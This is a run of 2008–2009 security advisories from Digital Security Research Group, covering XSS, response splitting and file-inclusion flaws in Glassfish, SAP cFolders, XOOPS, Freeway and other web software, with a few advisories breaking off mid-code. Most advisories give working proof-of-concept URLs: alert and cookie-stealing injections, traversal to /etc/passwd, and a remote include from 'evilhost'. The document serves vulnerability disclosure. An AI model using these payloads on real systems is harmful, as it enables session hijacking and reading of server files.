[DSECRG-09-034] Sun Glassfish Enterprise Server - Multiple Linked XSS vulnerabilies
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-034
Original advisory: http://dsecrg.com/pages/vul/show.php?id=134
Application:Sun Glassfish Enterprise Server
Versions Affected: 2.1
Vendor URL: https://glassfish.dev.java.net/
Bug:Multiple Linked XSS vulnerabilities
Exploits: YES
Reported: 19.03.2009
Vendor response:20.03.2009
Solution: YES
Date of Public Advisory:05.05.2009
Author: Digital Security Research Group [DSecRG] (research
[at] dsecrg [dot] com)
Description
***
Glassfish Enterprise Server Admin Console has multiple linked XSS
vulnerabilities.
Details
***
Using this vulnerability attacker can steal admin's cookie and then
authentificate as administrator or perform certain administrative
actions.
1. Multiple Linked XSS vulnerabilities.
Many pages have typical XSS vulnerability.
Attacker can inject XSS in URL string.
Example:
http://[server]/applications/applications.jsf?');};alert(DSecRG_XSS);/script!--
http://[server]/configuration/configuration.jsf?');};alert(DSecRG_XSS);/script!--
http://[server]/customMBeans/customMBeans.jsf?');};alert(DSecRG_XSS);/script!--
http://[server]/resourceNode/resources.jsf?');};alert(DSecRG_XSS);/script!--
http://[server]/sysnet/registration.jsf?');};alert(DSecRG_XSS);/script!--
http://[server]/webService/webServicesGeneral.jsf?');};alert(DSecRG_XSS);/script!--
Response HTML Code:
---
#
...
script type=text/javascript
var myonload = new Object();
myonload.oldonload = window.onload;
myonload.newonload = function() {
if
('/applications/applications.jsf?');};alert(DSecRG_XSS);/script!--' != '')
{
...
#
2. Multiple Linked XSS vulnerabilities in GET parameter name.
Many pages have typical XSS vulnerability in GET parameter name.
Attacker can inject XSS in URL string.
Example:
http://[server]/configuration/auditModuleEdit.jsf?name=IMG
SRC=javascript:alert('DSecRG_XSS')
http://[server]/configuration/httpListenerEdit.jsf?name=IMG
SRC=javascript:alert('DSecRG_XSS')configName=server-config
http://[server]/resourceNode/jdbcResourceEdit.jsf?name=IMG
SRC=javascript:alert('DSecRG_XSS')
Solution
This security vulnerabilities fixed in CVS.
The following links to the commit email messages for all the changes to fix
these issues:
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=29669
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=29668
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=29675
Credits
***
http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
[DSECRG-09-038] Sun Glassfish Woodstock Project - Linked XSS Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-038 Original advisory: http://dsecrg.com/pages/vul/show.php?id=138 Application:Sun Glassfish Woodstock Project (part of Glassfish Enterprise Server) Versions Affected: 4.2 Vendor URL: https://woodstock.dev.java.net/ Bug:Linked XSS Vulnerability Exploits: YES Reported: 19.03.2009 Vendor response:20.03.2009 Solution: YES Date of Public Advisory:05.05.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Woodstock components are User Interface Components for the web, based on Java Server Faces and AJAX. Woodstock also is part Glassfish Enterprise Server. Woodstock has linked XSS vulnerability in 404 Error page. Details *** Using this vulnerability attacker can steal admin's cookie and then authentificate as administrator or perform certain administrative actions. Attacker can inject XSS in URL string using UTF-7 encoding. Exploiting this issue required Auto-Select encoding in browser configuration. Example: http://[server]/theme/META-INF/+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7- Solution This security vulnerabilities fixed in CVS. The following link to the commit email message for the changes to fix these issue: https://woodstock.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=4041 Credits *** http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru
SAP Cfolders Multiple Linked XSS Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-021
Original advisory: http://dsecrg.com/pages/vul/show.php?id=121
Application:SAP Cfolders (SAP SRM, SAP ECC, SAP Knowledge
Management and SAP NetWeaver cRooms (collaboration rooms))
Vendor URL: http://SAP.com
Bugs: Multiple Liked XSS
Risk: Hight
Exploits: YES
Reported: 12.01.2009
Vendor response:13.01.2009
patched:21.01.2009
Date of Public Advisory:21.04.2009
Reference: SAP note 1292875
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
cFolders (Collaboration Folders) is the SAP web-based application for
collaborative sharing of information.
cFolders is part of a suite of applications powered by SAP® NetWeaver™ that
integrate project management,
knowledge management and resource management in collaborative inter-enterprise
and intra-enterprise
environments.
cFolders is integrated to SAP ECC, SAP Product Lifecycle
Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge
Management and SAP
NetWeaver™ cRooms (collaboration rooms). Virtual teams can access, view online,
subscribe for changes, and
redline documents and product information. Partners and suppliers can interact
with cFolders in predefined
collaborative or competitive scenarios.
Details
***
Multiple Linked XSS vulnerabilities found in SAP Cfolders engine. Any user can
cheate a vulnerable link
and steal user's or administrator's cookie.
He can do this using 3 Linked XSS vulnerabilities.
1. Linked XSS found in col_table_filter.htm page. Vulnerable parameter
p_current_role
Example:
https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=IMG/SRC=JaVaScRiPt:alert('DSECRG')
2. Linked XSS found in me_ov.htm page. Vulnerable parameter p_current_role
Example:
https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=
IMG/SRC=JaVaScRiPt:alert('DSECRG')
Fix Information
***
The issue has been solved. See SAP note 1292875.
References:
***
SAP note 1292875
https://service.sap.com/sap/support/notes/1292875
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
SAP Cfolders Multiple Stored XSS Vulnerabilies
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-014 Original advisory: http://dsecrg.com/pages/vul/show.php?id=114 Application:SAP Cfolders (included in: SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms) Vendor URL: http://SAP.com Bugs: Multiple Stored XSS Risk: Hight Exploits: YES Reported: 04.12.2008 Vendor response:05.12.2008 Vulnerability patched: 15.12.2008 Date of Public Advisory:21.04.2009 Reference: SAP note 1284360 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** cFolders (Collaboration Folders) is the SAP web-based application for collaborative sharing of information. cFolders is part of a suite of applications powered by SAP NetWeaver that integrate project management, knowledge management and resource management in collaborative inter-enterprise and intra-enterprise environments. cFolders is integrated to SAP ECC, SAP Product Lifecycle Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for changes, and redline documents and product information. Partners and suppliers can interact with cFolders in predefined collaborative or competitive scenarios. Details *** Multiple Stored XSS vulnerabilities found in SAP Cfolders engine. User which is a business partner of organization can steal Administrators cookie by inserting javascript into CFolders system. He can do this using 2 Stored XSS vulnerabilities. SAP Server dont associate session identificators with users IP adress or with any other additional data. IT autentificate users Only by cookies. So any user which can steal administrators cookie can use them to authentificate with administrator rights. 1. User can insert javascript code into site using link creation option He can inject javascript code into LINK field on page https://[site]/sap/bc/bsp/sap/cfx_rfc_ui/hyp_de_create.htm example LINK value: http://test.com; onmouseover=alert(document.cookie) Then when administrator will browse for user folders script will execute. 2. Second XSS vulnerability found in document uploading area. User can create a document with file name included javascript code. example filename value: scriptalert()/script.doc To do this user must change file name in http request when sending a request for file uploading. So using this vulnerability user can steal cookie like he do in first example. Fix Information *** The issue has been solved. See SAP note 1284360. References: *** SAP note 1284360 https://service.sap.com/sap/support/notes/1284360 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru
[DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-009
--link to original advisory --
http://www.dsecrg.com/pages/vul/show.php?id=82
Application:APC PowerChute Network Shutdown's Web Interface
Vendor URL: http://www.apc.com/
Bug:XSS/Response Splitting
Exploits: YES
Reported: 20.10.2008
Vendor Response:20.10.2008
Vendor Reference: 081020-000796
Solution: Use Firewall
Date of Public Advisory:26.02.2009
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Linked XSS and Response Splitting vulnerabilities found in APC PowerChute
Network Shutdown's Web Interface.
Details
***
1. Linked XSS Vulnerability found in script /security/applet vulnerable
parameter - referrer
Example
***
GET /security/applet?referrer='img/src=javascript:alert('DSECRG_XSS')
2. Response Splitting Vulnerability found in script contexthelp. vulnerable
parameter - page
Example
***
GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0
response:
HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html
Solution
http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539
A low-risk web interface vulnerability has been discovered in the PowerChute
Business Edition Shutdown Agent.
This issue is scheduled to be addressed in a release of the application.
While the severity of this vulnerability has been determined to be minimal,
it is recommended that user's continue to ensure the highest level of
protection possible through the placement of PowerChute Business Edition behind
a firewall.
References
**
http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards.
Digital Security Research Group focuses on web application and database
security problems with vulnerability reports, advisories and whitepapers posted
regularly on our website.
Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com
[DSECRG-09-008] JOnAS(4.10.3) - Linked XSS Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-008
--link to original advisory --
http://www.dsecrg.com/pages/vul/show.php?id=81
Application:JOnAS (Java Open Application Server)
Versions Affected: JOnAS(4.10.3) / Apache Tomcat (5.5.26)
Vendor URL: http://wiki.jonas.objectweb.org/
Bugs: Linked XSS
Exploits: YES
Reported: 21.01.2009
Vendor response:NONE
Second Reported:29.01.2009
Vendor response:NONE
Date of Public Advisory:25.02.2009
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
JOnAS is a leading edge Open Source implementation by OW2 of the Java EE
specification
Linked XSS vulnerability found in JOnAS engine.
Using this vulnerabilities attacker can steal admin's cookie and then
authentificate as administrator or perform certain administrative
actions.
Details
***
Linked XSS vulnerabilities found in script ListMBeanDetails.do. vulnerable
parameter select.
In normal case select parameter looks like this:
select=jonas:j2eeType=EJBModule
when we try to include another variable with te same name, for example like
this:
select=jonas:j2eeType=EJBModule,j2eeType=EJBModule
So we will see the error page which will tell us that j2eeType variable are
also defined.
When we include javascipt code into variable name it will appear in error page:
select=jonas:j2eeTypescriptalert()/script=EJBModule,j2eeTypescriptalert()/script=EJBModule
Example
***
http://localhost:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeTypescriptalert('DSecRG%20XSS')/script%3DEJBModule%2Cj2eeTypescriptalert('DSecRG%20XSS')/script%3DEJBModule
Fix Information
***
No patches aviable.
We did not get any response from vendor for more than 2 weeks.
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
Digital Security Research Group
__
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: resea...@dsecrg.com
www.dsecrg.com
---
This message and any attachment are confidential and may be privileged or
otherwise protected
from disclosure. If you are not the intended recipient any use, distribution,
copying or disclosure
is strictly prohibited. If you have received this message in error, please
notify the sender immediately
either by telephone or by e-mail and delete this message and any attachment
from your system. Correspondence
via e-mail is for information purposes only. Digital Security neither makes nor
accepts legally binding
statements by e-mail unless otherwise agreed.
---
[DSECRG-09-004] AXIS 70U Network Document Server - Privilege Escalation and XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-004
AXIS 70U Network Document Server - Privilege Escalation and XSS
http://dsecrg.com/pages/vul/show.php?id=60
Application:AXIS 70U Network Document Server (Web Interface)
Versions Affected: 3.0
Vendor URL: http://www.axis.com/
Bug:Local File Include and Privilege Escalation,
Multiple Linked XSS
Exploits: YES
Reported: 20.10.2008
Vendor response:20.10.2008
Last response: 02.01.2009
Vendor Case ID: 143027
Solution: NONE
Date of Public Advisory:19.01.2009
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Vulnerabilities found in Web Interface of device AXIS 70U Network Document
Server.
1. Local File Include and Privilege Escalation.
Standard user can escalate privileges to administrator.
2. Multiple Linked XSS vulnerabilities
Details
***
1. Local File Include and Privilege Escalation.
Local File Include vulnerability found in script user/help/help.shtml
User can unclude any local files even in admin folder.
Example:
http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml
2. Multiple Linked XSS vulnerabilities
Linked XSS vulnerability found in scripts:
user/help/help.shtml
user/help/general_help_user.shtml
Attacker can inject XSS script in URL.
Example:
http://[server]/user/help/help.shtml?scriptalert('DSecRG XSS')/script
http://[server]/user/help/general_help_user.shtml?scriptalert('DSecRG
XSS')/script
Solution
Vendor decided that this vulnerability is not critical and there is no
patches for this firmware. But maybe he will patch issues on the next firmware
release
Vendore response:
[13.01.2009]: We don't see any major vulnerability issues with the current
firmware of Axis 70U but we will consider the mentioned issues on the next
firmware release.
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsecrg.com
http://www.dsec.ru
Digital Security opens a site of its research center DSec Research Group
Digital Security opens a site of its research center DSec Research Group Digital Security opens a site of its research center DSec Research Group [DSecRG], the main mission of which is to conduct researches of different application and system vulnerabilities. The result of this work is then used by the experts of the Digital Security audit department for assessing the security level of information systems with the use of active audit methods and also while carrying out penetration tests. Data about the vulnerabilities found by DSecRG experts is published in SecurityFocus mailing lists, Milw0rm.com portal and now it is available at DSecRG website ( www.dsecrg.com ) in the form of advisories and whitepapers. Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: resea...@dsec.ru www.dsecrg.com www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-040
Application:XOOPS
Versions Affected: 2.3.1
Vendor URL: http://www.xoops.org/
Bug:Multiple Local File Include
Exploits: YES
Reported: 10.11.2008
Vendor response:10.11.2008
Solution: YES
Date of Public Advisory:08.12.2008
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
XOOPS has Multiple Local File Include vulnerabilities.
Details
***
Local File Include vulnerability found in scripts:
xoops_lib/modules/protector/blocks.php
xoops_lib/modules/protector/main.php
Successful exploitation requires that register_globals is enabled.
Code
#
$mytrustdirname = basename( dirname( __FILE__ ) ) ;
$mytrustdirpath = dirname( __FILE__ ) ;
// language files
$language = empty( $xoopsConfig['language'] ) ? 'english' :
$xoopsConfig['language'] ;
if( file_exists( $mydirpath/language/$language/main.php ) ) {
// user customized language file (already read by common.php)
// include_once $mydirpath/language/$language/main.php ;
} else if( file_exists( $mytrustdirpath/language/$language/main.php ) ) {
// default language file
include_once $mytrustdirpath/language/$language/main.php ;
...
#
For successful exploitation first condition in if..else statement must be not
true.
Example:
http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRGxoopsConfig[language]=../../../../../../../boot.ini%00
http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRGxoopsConfig[language]=../../../../../../../boot.ini%00
Solution
Vendor fixed this flaw on 26.11.2008.
XOOPS 2.3.2a Security Release can be download from Sourceforge repository:
https://sourceforge.net/project/showfiles.php?group_id=41586package_id=153583release_id=643010
Release notes:
http://www.xoops.org/modules/news/article.php?storyid=4540
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-039] Local File Include Vulnerability in Pluck CMS 4.5.3
Hello, bugtraq.
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039
Application:Pluck CMS
Versions Affected: 4.5.3
Vendor URL: http://www.pluck-cms.org/
Bug:Local File Include
Exploits: YES
Reported: 25.08.2008
Vendor Response:30.08.2008
Solution: YES
Date of Public Advisory:18.11.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Pluck CMS has Local File Include vulnerability.
Details
***
1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php
Successful exploitation requires that register_globals is enabled.
Code
#
if (!isset($g_pcltar_lib_dir))
$g_pcltar_lib_dir = lib;
...
$g_pcltar_extension = php;
if (!defined(PCLERROR_LIB))
{
include(data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension);
}
if (!defined(PCLTRACE_LIB))
{
include(data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension);
}
#
Example:
http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00
Solution
Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be
download here:
http://www.pluck-cms.org/downloads/click.php?id=8
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards.
Digital Security Research Group focuses on web application and database
security problems with vulnerability reports, advisories and whitepapers posted
regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-038] Multiple Local File Include Vulnerabilities in ezContents CMS 2.0.3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-038
Application:ezContents CMS
Versions Affected: 2.0.3
Application URL:http://www.ezcontents.org/
Vendor URL: http://www.visualshapers.com/
Bug:Multiple Local File Include
Exploits: YES
Reported: 05.08.2008
Second report: 18.08.2008
Vendor Response:NONE
Solution: NONE
Date of Public Advisory:25.08.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
ezContents CMS has Multiple Local File Include vulnerabilities.
Details
***
1. Local File Include vulnerability found in script /module.php
Vulnerable GET parameter link.
First discovered by Zero_X [http://secunia.com/advisories/10604/].
Vendor fixed vulnerability in version 2.0.3 by adding verification for this
parameter.
However, attacker still can include local files.
Code [line 32-42, 141-145]
--
#
$GLOBALS[rootdp] = './';
require_once ($GLOBALS[rootdp].include/config.php);
require_once ($GLOBALS[rootdp].include/db.php);
require_once ($GLOBALS[rootdp].include/session.php);
include_once ($GLOBALS[rootdp].$GLOBALS[modules_home].modfunctions.php);
if ((!isset($HTTP_GET_VARS[ezSID])) (isset($HTTP_POST_VARS[ezSID])))
$HTTP_GET_VARS[ezSID] = $HTTP_POST_VARS[ezSID];
if ((!isset($HTTP_GET_VARS[link])) (isset($HTTP_POST_VARS[link])))
$HTTP_GET_VARS[link] = $HTTP_POST_VARS[link];
$HTTP_GET_VARS[link] = str_replace('../', '', $HTTP_GET_VARS[link]);
...
if (isExternalLink ($HTTP_GET_VARS[link])) {
ECHO 'Remote Code Execution Patch Installed on this implementation of
ezContents';
} else {
include($GLOBALS[rootdp].$HTTP_GET_VARS[link]);
}
#
isExternalLink() function in script /include/functions.php checks for remote
inclusion attempts.
Code [line 768-779]
---
#
function isExternalLink ($linkref)
{
if ( (substr($linkref,0,5) == 'http:') ||
(substr($linkref,0,6) == 'https:') ||
(substr($linkref,0,5) == 'file:') ||
(substr($linkref,0,4) == 'ftp:') ||
(substr($linkref,0,7) == 'gopher:')||
(substr($linkref,0,7) == 'mailto:') ||
(substr($linkref,0,5) == 'news:') ||
(substr($linkref,0,7) == 'telnet:') ||
(substr($linkref,0,5) == 'wais:') ) {
return True;
} else {
return False;
}
} // isExternalLink
#
Example:
http://[server]/[installdir]/module.php?link=//////////////////////////etc/passwd
2. Local File Include vulnerabilities found in scripts
/modules/diary/showdiary.php
/modules/diary/showeventlist.php
/modules/gallery/showgallery.php
/modules/reviews/showreviews.php
Successful exploitation requires that register_globals is enabled.
Code [showdiary.php, line 32-45]
#
global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS[PHP_SELF],-11) == 'control.php') ||
(substr($HTTP_SERVER_VARS[PHP_SELF],-10) == 'module.php') ||
(substr($HTTP_SERVER_VARS[PHP_SELF],-16) == 'showcontents.php') ) {
require_once('./modules/moduleSec.php');
} else {
require_once('../moduleSec.php');
}
$GLOBALS[ModuleName] = 'diary';
if (!isset($GLOBALS[gsLanguage])) { Header(Location:
.$GLOBALS[rootdp].module.php?link=.$GLOBALS[modules_home].$GLOBALS[ModuleRef]./showdiary.php);
}
include_once
($GLOBALS[language_home].$GLOBALS[gsLanguage]./lang_admin.php);
include_once
($GLOBALS[language_home].$GLOBALS[gsLanguage]./lang_main.php);
#
Script /modules/moduleSec.php checks for inclusion attempts.
Code
#
function moduleExternalLink ($linkref)
{
if ($linkref != '') {
if ( (substr($linkref,0,5) == 'http:') ||
(substr($linkref,0,6) == 'https:') ||
(substr($linkref,0,5) == 'file:') ||
(substr($linkref,0,4) == 'ftp:') ||
(substr($linkref,0,7) == 'gopher:')||
(substr($linkref,0,7) == 'mailto:') ||
(substr($linkref,0,5) == 'news:') ||
(substr($linkref,0,7) == 'telnet:') ||
(substr($linkref,0,5) == 'wais:') ) {
return True;
} else {
return False;
}
} else
[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-036
Application:Freeway eCommerce
Versions Affected: 1.4.1.171
Vendor URL: http://www.openfreeway.org/
Bugs: RFI, Multiple LFI, XSS
Exploits: YES
Reported: 27.06.2008
Second report: 04.07.2008
Vendor response:06.07.2008
Solution: YES
Date of Public Advisory:18.08.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Freeway eCommerce system has multiple security vulnerabilities:
1. Multiple Remote/Local File Include
2. Linked XSS vulnerability
Details
***
1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities.
1.1 Remote File Include vulnerability found in script admin/create_order_new.php
Vulnerable GET parameter include_page.
Code
#
...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...
if($command!=)
{
switch($command){
...
case 'include_page':
require($HTTP_GET_VARS['include_page']);
break;
...
#
Example:
http://[server]/[installdir]/admin/create_order_new.php?command=include_pageinclude_page=http://evilhost/info.php
1.2 Local File Include vulnerability found in script
includes/events_application_top.php
Successful exploitation requires that register_globals is enabled.
Code
#
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL);
#
Example:
http://[server]/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00
1.3 Local File Include vulnerabilities found in scripts
includes/languages/english/account.php
includes/languages/french/account.php
Successful exploitation requires that register_globals is enabled.
Code
#
require(DIR_WS_LANGUAGES . $language . /events_account.php);
#
Example:
http://[server]/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00
1.4 Local File Include vulnerability found in script
includes/languages/french/account_newsletters.php
Successful exploitation requires that register_globals is enabled.
Code
#
require(DIR_WS_LANGUAGES . $language . /events_account_newsletters.php);
#
Example:
http://[server]/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00
1.5 Local File Include vulnerability found in script
includes/modules/faqdesk/faqdesk_article_require.php
Successful exploitation requires that register_globals is enabled.
Code
#
//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE);
#
Example:
http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
1.6 Local File Include vulnerability found in script
includes/modules/newsdesk/newsdesk_article_require.php
Successful exploitation requires that register_globals is enabled.
Code
#
//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE);
#
Example:
http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
1.7 Local File Include vulnerability found in script
templates/Freeway/boxes/card1.php
Successful exploitation requires that register_globals is enabled.
Code
#
require(DIR_WS_LANGUAGES . $language . '/cards1_box.php');
#
Example:
http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00
1.8 Local File Include vulnerability found in script
templates/Freeway/boxes/loginbox.php
Successful exploitation requires that register_globals is enabled.
Code
#
require(DIR_WS_LANGUAGES . $language . '/loginbox.php
[DSECRG-08-035] Local File Include Vulnerability in Gallery 1.5.7, 1.6-alpha3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-035
Application:Gallery
Versions Affected: 1.5.7, 1.6-alpha3
Vendor URL: http://gallery.menalto.com/
Bug:Local File Include
Exploits: YES
Reported: 14.07.2008
Vendor response:15.07.2008
Solution: YES
Date of Public Advisory:08.08.2008
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Gallery system has local file include vulnerability in script
contrib/phpBB2/modules.php
Successful exploitation requires that register_globals is enabled.
Code
#
switch ($_REQUEST['op']) {
case 'modload':
// Added with changes in Security for PhpBB2.
define('IN_PHPBB', true);
define (LOADED_AS_MODULE,1);
$phpbb_root_path = ./;
// connect to phpbb
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.'.$phpEx);
include_once($phpbb_root_path . 'includes/functions.'.$phpEx);
#
Example:
http://[server]/[installdir]/contrib/phpBB2/modules.php?op=modloadphpEx=../../../../../../../../../../../../../etc/passwd
Solution
Vendor fix this flaw on 05.08.2008. Download Gallery 1.5.8 and 1.6-RC1 from
download page on SourceForge:
http://sourceforge.net/project/showfiles.php?group_id=7130package_id=7239abmode=1
More information about release:
http://gallery.menalto.com/gallery_1.5.8_released
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-034] Local File Include Vulnerability in Minishowcase v09b136
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-034
Application:Minishowcase Image Gallery
Versions Affected: v09b136
Vendor URL: http://minishowcase.frwrd.net
Bug:Local File Include
Exploits: YES
Reported: 14.07.2008
Second report: 22.07.2008
Vendor response:NONE
Solution: NONE
Date of Public Advisory:29.07.2008
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Minishowcase Image Gallery has local file include vulnerability in script
libraries/general.init.php
Vulnerable GET parameters lang.
Successful exploitation requires that register_globals is enabled.
Code
#
...
$_dir_file = dirname(dirname(__FILE__));
$_dir_path = dirname($_SERVER[DOCUMENT_ROOT] . $_SERVER['PHP_SELF']);
if ($_dir_file != $_dir_path) {
if (!isset($settings['minishowcase_url'])
|| ($settings['minishowcase_url'] == )) {
die (p
style=\margin:6px;padding:20px;text-align:left;font-size:18px;background:#f60;color:#FFF;\ALERT:
if you are including minishowcase with PHP into a website, please set the
code\$minishowcase_url/code variable in the
code/config/settings.php/code file/p);
}
}
...
